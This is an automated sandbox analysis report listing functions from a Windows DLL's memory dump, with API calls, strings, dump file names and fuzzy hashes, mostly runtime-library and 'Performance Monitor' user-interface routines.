Function 6EA07BD0, Relevance: 10.6, APIs: 7, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6EA07BEE
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6EA07BFC
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6EA07C11
SysFreeString.OLEAUT32(00000000), ref: 6EA07C1C
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6EA07C3B
SysFreeString.OLEAUT32(00000000), ref: 6EA07C48
SysFreeString.OLEAUT32 ref: 6EA07C72

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: 3a246887d7700dfa28b214a83c19a5d4f7bc29aa5dcb7e762310b18085c219ed
Instruction ID: c5325b3d7b48b85c7919ba156cbc6ca2db9e82ca626655d3cf5ffee3c9a5d4b8
Opcode Fuzzy Hash: 3a246887d7700dfa28b214a83c19a5d4f7bc29aa5dcb7e762310b18085c219ed
Instruction Fuzzy Hash: 8A114831640726FFDE6026949C0DF9A7F69DB07B25F204205FA14FE1C0CAB29D85C5A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA33CFE, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6EA33A48: _free.LIBCMT ref: 6EA33A6D

_free.LIBCMT ref: 6EA33D4C

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

_free.LIBCMT ref: 6EA33D57
_free.LIBCMT ref: 6EA33D62
_free.LIBCMT ref: 6EA33DB6
_free.LIBCMT ref: 6EA33DC1
_free.LIBCMT ref: 6EA33DCC
_free.LIBCMT ref: 6EA33DD7

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 626a4af83b5a11caf917ef27dbac739c1afc9d2b6aaeb70603d007920aac55e6
Instruction ID: 7309bd2e87f377bf1f1e86cf4f3d57c2ef6311177cb8dc0c117f8782345d6e69
Opcode Fuzzy Hash: 626a4af83b5a11caf917ef27dbac739c1afc9d2b6aaeb70603d007920aac55e6
Instruction Fuzzy Hash: 0E118171984B14BAD620ABF0DD0AFCB779CAF40B05F444C38B2F9A6190DB3BB9895754

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1AB77, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6EA1AC38,00000000,?,00000001,00000000,?,6EA1ACAF,00000001,FlsFree,6EA3BE2C,FlsFree,00000000), ref: 6EA1AC07

Strings

@Mt, xrefs: 6EA1ABB7
api-ms-, xrefs: 6EA1ABC7

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: @Mt$api-ms-
API String ID: 3664257935-3606155711
Opcode ID: 6eed250f0aa91cbe1c9073b83d243511d18b91683709f3297e6ce6a4512e0107
Instruction ID: 2ec409375c4025f344d640d2bd8de7807bdf85d526c209672dbf08b356df55b6
Opcode Fuzzy Hash: 6eed250f0aa91cbe1c9073b83d243511d18b91683709f3297e6ce6a4512e0107
Instruction Fuzzy Hash: BC11A735A4DA71ABDF624AA88C40B8D37A79F027B0F294110E914FF284D770ED8986D9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA175F0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6EA175FC
GetLastError.KERNEL32(8007000E,?,?,?,00000000), ref: 6EA17601
_com_issue_error.COMSUPP ref: 6EA17614
GetLastError.KERNEL32(?,?,?,00000000), ref: 6EA17622
_com_issue_error.COMSUPP ref: 6EA17635

Strings

@Mt, xrefs: 6EA17601, 6EA17622

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ErrorLast
String ID: @Mt
API String ID: 1321852664-1491384996
Opcode ID: ac7abe776e1d684bcf3bea366ece25cb804dcf316db8a9cf0825f49a746f0783
Instruction ID: e71cd8855dc815e2e11600608e9e7fe95b64f0108d7c0fe1d517a953a567393d
Opcode Fuzzy Hash: ac7abe776e1d684bcf3bea366ece25cb804dcf316db8a9cf0825f49a746f0783
Instruction Fuzzy Hash: C2E0C2B440C26296CA1067F18E087FA314C5F03179F245E54706CE80E0EF3CC1C696BD

Uniqueness

Uniqueness Score: -1.00%

Function 6EA10A60, Relevance: 9.2, APIs: 6, Instructions: 198threadCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 6EA10B0E

Part of subcall function 6EA123E0: EnterCriticalSection.KERNEL32(6EA4CA58), ref: 6EA12414
Part of subcall function 6EA123E0: GetClassInfoExW.USER32 ref: 6EA12449
Part of subcall function 6EA123E0: GetClassInfoExW.USER32 ref: 6EA1245C
Part of subcall function 6EA123E0: LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA12467

Part of subcall function 6EA173A0: GetProcessHeap.KERNEL32(00000008,00000008,00000000,6EA1226B), ref: 6EA173A5
Part of subcall function 6EA173A0: HeapAlloc.KERNEL32(00000000), ref: 6EA173AC

SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,6EA38FD0,000000FF), ref: 6EA10B57
GetCurrentThreadId.KERNEL32 ref: 6EA10BFC
EnterCriticalSection.KERNEL32(6EA4CA58), ref: 6EA10C0A
LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA10C23
CreateWindowExW.USER32 ref: 6EA10C59

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ClassEnterHeapInfoLeave$AllocClientCreateCurrentErrorLastProcessRectThreadWindow
String ID:
API String ID: 859899439-0
Opcode ID: e538de4996480cd9e8527ac29f5ae5dc14b6621176d3f3e9f8763ec40ed9792c
Instruction ID: c31c044b31245f708041cad2372c77850c55a359210d113fe3bd9ab076d2c7ff
Opcode Fuzzy Hash: e538de4996480cd9e8527ac29f5ae5dc14b6621176d3f3e9f8763ec40ed9792c
Instruction Fuzzy Hash: 1D617DB1904619EFDB10CFA8C894BAEBBB5FF49714F148219F815BB340E731A890CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0DF40, Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,00000000,00000000,?,C000008C,00000001), ref: 6EA0DF7E
CharNextW.USER32(00000000,?,00000000,00000000), ref: 6EA0DFAB
CharNextW.USER32(7691EEF0,?,00000000,00000000), ref: 6EA0DFC4
CharNextW.USER32(7691EEF0,?,00000000,00000000), ref: 6EA0DFCF
CharNextW.USER32(00000001,?,00000000,00000000), ref: 6EA0E03E

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 5b1051969ba183dc6312f412297b5e235eb2598d312d0c83babd0db62d23b999
Instruction ID: 8aab628767e6751dd0da772a36d5e91995617bf9830400c9b93cac899311304e
Opcode Fuzzy Hash: 5b1051969ba183dc6312f412297b5e235eb2598d312d0c83babd0db62d23b999
Instruction Fuzzy Hash: B041F736604216CFCF10DFA9E880269B7F2EF89314B55C46AD444CB354E7319E82DB95

Uniqueness

Uniqueness Score: -1.00%

Function 6EA04690, Relevance: 9.1, APIs: 6, Instructions: 123COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EA046D9
std::_Lockit::_Lockit.LIBCPMT ref: 6EA046FB
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA0471B
__Getctype.LIBCPMT ref: 6EA047B1
std::_Facet_Register.LIBCPMT ref: 6EA047D0
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA047E8

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 3586b3bef8e6d82e4d1c19e4d4afdb6edee489ac06be206ae92b6d9aaa4faa90
Instruction ID: 31704a8d7a787edb850bbf193b06be1dd7fe97ffadc4fc29ea933840c1717636
Opcode Fuzzy Hash: 3586b3bef8e6d82e4d1c19e4d4afdb6edee489ac06be206ae92b6d9aaa4faa90
Instruction Fuzzy Hash: 0C412070E04604DFDB12DF98D940ADEB7B8FF15718F148169D805AB341EB31AE86CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0D600, Relevance: 9.1, APIs: 6, Instructions: 121registryCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA0D510: GetModuleHandleW.KERNEL32(Advapi32.dll,065D8F34), ref: 6EA0D564

RegCloseKey.ADVAPI32(?,?,?), ref: 6EA0D662
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 6EA0D6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 6EA0D6E3
RegCloseKey.ADVAPI32(?), ref: 6EA0D6F8
RegCloseKey.ADVAPI32(?), ref: 6EA0D720
RegCloseKey.ADVAPI32(?), ref: 6EA0D748

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum$HandleModule
String ID:
API String ID: 2852649468-0
Opcode ID: 2a71e361683afd09a00498a6321d590d527049b11827402676952528cf90dfa4
Instruction ID: 9cd80e84139b671ac3b59361e95a3e8b187988957d626a37e0d691ba9af61614
Opcode Fuzzy Hash: 2a71e361683afd09a00498a6321d590d527049b11827402676952528cf90dfa4
Instruction Fuzzy Hash: C04171B22083159BD710DF65EC54BABB7E8EF88358F00492EF959D7280DB70D904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0F4C0, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 351COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6EA00000,?,00000104), ref: 6EA0F6AC
GetModuleHandleW.KERNEL32(00000000), ref: 6EA0F864

Part of subcall function 6EA07B50: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 6EA07B5D

Strings

Module_Raw, xrefs: 6EA0F93C
REGISTRY, xrefs: 6EA0F969
Module, xrefs: 6EA0F911

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$ExceptionFileHandleNameRaise
String ID: Module$Module_Raw$REGISTRY
API String ID: 1728487212-549000027
Opcode ID: 60abe33ce1c549cb10ef498ad77e66af319e17aa0f8bcf00bd31957de85e78c6
Instruction ID: ca57ed23b07e83de1616bc68ced064a8aa2db5dab387b29d8179ec6df391ddaa
Opcode Fuzzy Hash: 60abe33ce1c549cb10ef498ad77e66af319e17aa0f8bcf00bd31957de85e78c6
Instruction Fuzzy Hash: 5AD18379A002258BDB649BA4ED50BDE7374BF45308F1405ADD80AB7640EB74AEC4CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA105E0, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 276COMMON

Download Yara Rule

APIs

Part of subcall function 6EA0AF10: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,065D8F34,?), ref: 6EA0AD57

ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6EA10638
PdhRemoveCounter.PDH(?,?,00000000), ref: 6EA106D3
PdhCloseQuery.PDH(?,?,00000000), ref: 6EA106E8

Strings

edit, xrefs: 6EA10631
0, xrefs: 6EA10796

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCounterExecuteFolderPathQueryRemoveShell
String ID: 0$edit
API String ID: 2809573910-562573004
Opcode ID: 9ce524eacb2d38da9ecaa42db8d79ed57e9d32dfe270d9d31d233b296146a7e1
Instruction ID: 3656a9c2eae75e9e2334d6a863338bc1d48d7794a84aa93d74a58b1d09c6d598
Opcode Fuzzy Hash: 9ce524eacb2d38da9ecaa42db8d79ed57e9d32dfe270d9d31d233b296146a7e1
Instruction Fuzzy Hash: 5A91EE716087118BE700CFA8C990B9AB7A5FF85318F104A1CE9949B290E772EDD5CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05F40, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158threadCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA05F6A
GetOEMCP.KERNEL32(00000000,?,0000004E,00000002,0000006F,?,0000004E,00000000,?,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05FD1
GetForegroundWindow.USER32(?,0000004E,00000002,0000006F,?,0000004E,00000000,?,?,00000000,00000000,0000005F), ref: 6EA06043
GetThreadLocale.KERNEL32(?,0000004E,00000002,0000006F,?,0000004E,00000000,?,?,00000000,00000000,0000005F), ref: 6EA06118

Strings

H, xrefs: 6EA0607A

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ForegroundLocaleThreadUnothrow_t@std@@@Window__ehfuncinfo$??2@
String ID: H
API String ID: 711472001-2852464175
Opcode ID: cc203cb137191a7b3d4a95f635864bd430ffdc335c225fc62dde348511fe6341
Instruction ID: 65b940eaefa3be152e41923aef6e8d45d7b2b1b3f6359c1b92e8aeb300da24c9
Opcode Fuzzy Hash: cc203cb137191a7b3d4a95f635864bd430ffdc335c225fc62dde348511fe6341
Instruction Fuzzy Hash: 2851F632D20B1CDACB029BBB944069DF3B66FDF244F18C755A904B7355EB3519C68A44

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2B760, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6EA27C0A: _free.LIBCMT ref: 6EA27C18

Part of subcall function 6EA2C80B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,6EA2E018,?,00000000,00000000), ref: 6EA2C8AD

GetLastError.KERNEL32 ref: 6EA2B7C8
__dosmaperr.LIBCMT ref: 6EA2B7CF
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6EA2B80E
__dosmaperr.LIBCMT ref: 6EA2B815

Strings

@Mt, xrefs: 6EA2B7C8, 6EA2B80E

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID: @Mt
API String ID: 167067550-1491384996
Opcode ID: ab6e026e2f3c2f1a9407cc1597d1102d7ca96ddbfc7d4ebd51bccb25d0ba9b4f
Instruction ID: 8c473cfcd82c18fa6c6b5f156d22a1cabdfc0534d37669ad620441e528220306
Opcode Fuzzy Hash: ab6e026e2f3c2f1a9407cc1597d1102d7ca96ddbfc7d4ebd51bccb25d0ba9b4f
Instruction Fuzzy Hash: 6B21B871504615AFDB109FF6CD808A677ADEF0536871C8B34E429B7154E730DDC187A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA023B0, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6EA0244F

Part of subcall function 6EA1838E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,24448D6E,6EA152C0,?,6EA49E54,?,?,?,24448D6E), ref: 6EA183EE

Strings

ios_base::badbit set, xrefs: 6EA023E7, 6EA02412, 6EA02433
t, xrefs: 6EA023B0
ios_base::failbit set, xrefs: 6EA022E5, 6EA023F1
ios_base::eofbit set, xrefs: 6EA023F6

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$t
API String ID: 3109751735-4201806346
Opcode ID: bc6cf4a6604351c9de53680cd487fb7ca87e3876fe885997daea5f5609e31b5e
Instruction ID: ed13e74eb30734bdada0821f880c430041a245d8f83c7e361d9475df7660b43b
Opcode Fuzzy Hash: bc6cf4a6604351c9de53680cd487fb7ca87e3876fe885997daea5f5609e31b5e
Instruction Fuzzy Hash: 1A11D5B2904715AFC700CED8E801BD6B3DCAF15214F58851AF964DB681F770E9D4CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2897C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
_free.LIBCMT ref: 6EA289DE
_free.LIBCMT ref: 6EA28A14
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

Strings

@Mt, xrefs: 6EA28981

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID: @Mt
API String ID: 2283115069-1491384996
Opcode ID: c75c497739f92b12a78b3fd194c3b83cd9b25a2c9032b706ea21a20b39228be2
Instruction ID: b44f26e4da50ec4f3c77395e4a35ee2c70f2af7aeff06125b133b6e5fc8d3fce
Opcode Fuzzy Hash: c75c497739f92b12a78b3fd194c3b83cd9b25a2c9032b706ea21a20b39228be2
Instruction Fuzzy Hash: 5711C672208A05AFEB5116F88D84A5B259DEFC237872D0A34F128BF1C4DF22CD86413D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA28AD3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6EA24AA1,6EA282CF,?,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?), ref: 6EA28AD8
_free.LIBCMT ref: 6EA28B35
_free.LIBCMT ref: 6EA28B6B
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?,?), ref: 6EA28B76

Strings

@Mt, xrefs: 6EA28AD8

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID: @Mt
API String ID: 2283115069-1491384996
Opcode ID: 642d55481963e9539787b575713957a82e056d5f42fed4e775fd9b86c07271da
Instruction ID: 55cd91c964cbe54724fae24bbb47eee5652646ff5b2af0ae982799e34f026c2b
Opcode Fuzzy Hash: 642d55481963e9539787b575713957a82e056d5f42fed4e775fd9b86c07271da
Instruction Fuzzy Hash: FE1186B2248B056FDB4115F94D84E5A255DEFC637872D4A38F128BE1D4DE23CD868138

Uniqueness

Uniqueness Score: -1.00%

Function 6EA10D20, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6EA10D4A
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6EA10D5E
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6EA10D72

Strings

Performance Monitor - (Edit Configuration), xrefs: 6EA10D60
Performance Monitor - (Reload Configuration), xrefs: 6EA10D4C

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: InsertMenu
String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
API String ID: 1478380399-4081388356
Opcode ID: 48d954b4bb90e59484008396503a7fdfbae343d5d4bac243237456b845e63e46
Instruction ID: 3fd092156d50764e001fb1294e03d4cfa0311f8cfec5f9fd754cbdf95550757c
Opcode Fuzzy Hash: 48d954b4bb90e59484008396503a7fdfbae343d5d4bac243237456b845e63e46
Instruction Fuzzy Hash: 12F05E3324421DBBEB11DEC59C81FBB7B6CEB49710F148416FB14AA181C371A9269BB8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA25019, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6EA24FCB,?,?,6EA24F93,?,00000000,?), ref: 6EA2502E
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EA25041
FreeLibrary.KERNEL32(00000000,?,?,6EA24FCB,?,?,6EA24F93,?,00000000,?), ref: 6EA25064

Strings

CorExitProcess, xrefs: 6EA25039
mscoree.dll, xrefs: 6EA25027

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 29891d75e3c356b98cccbc5611185e5c5e4248ede032101dd84d46cc3118d040
Instruction ID: 5997a3b0dc86cd62d2cf280c855f63a41c166ddecfef124b485d21567bf3ec16
Opcode Fuzzy Hash: 29891d75e3c356b98cccbc5611185e5c5e4248ede032101dd84d46cc3118d040
Instruction Fuzzy Hash: ABF05831900628FFDF219B91CD09B9E7B7AFF01352F194160B905FA260CB368E81DAD6

Uniqueness

Uniqueness Score: -1.00%

Function 6EA36EEE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6EA26918,00000000,?,?,6EA3631D,?,00000001,?,00000001,?,6EA2E85A,00000000,00000000,00000001), ref: 6EA36F05
GetLastError.KERNEL32(?,6EA3631D,?,00000001,?,00000001,?,6EA2E85A,00000000,00000000,00000001,00000000,00000001,?,6EA2EDAE,6EA2685B), ref: 6EA36F11

Part of subcall function 6EA36ED7: CloseHandle.KERNEL32(FFFFFFFE,6EA36F21,?,6EA3631D,?,00000001,?,00000001,?,6EA2E85A,00000000,00000000,00000001,00000000,00000001), ref: 6EA36EE7

___initconout.LIBCMT ref: 6EA36F21

Part of subcall function 6EA36E99: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EA36EC8,6EA3630A,00000001,?,6EA2E85A,00000000,00000000,00000001,00000000), ref: 6EA36EAC

WriteConsoleW.KERNEL32(?,?,6EA26918,00000000,?,6EA3631D,?,00000001,?,00000001,?,6EA2E85A,00000000,00000000,00000001,00000000), ref: 6EA36F36

Strings

@Mt, xrefs: 6EA36F11

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
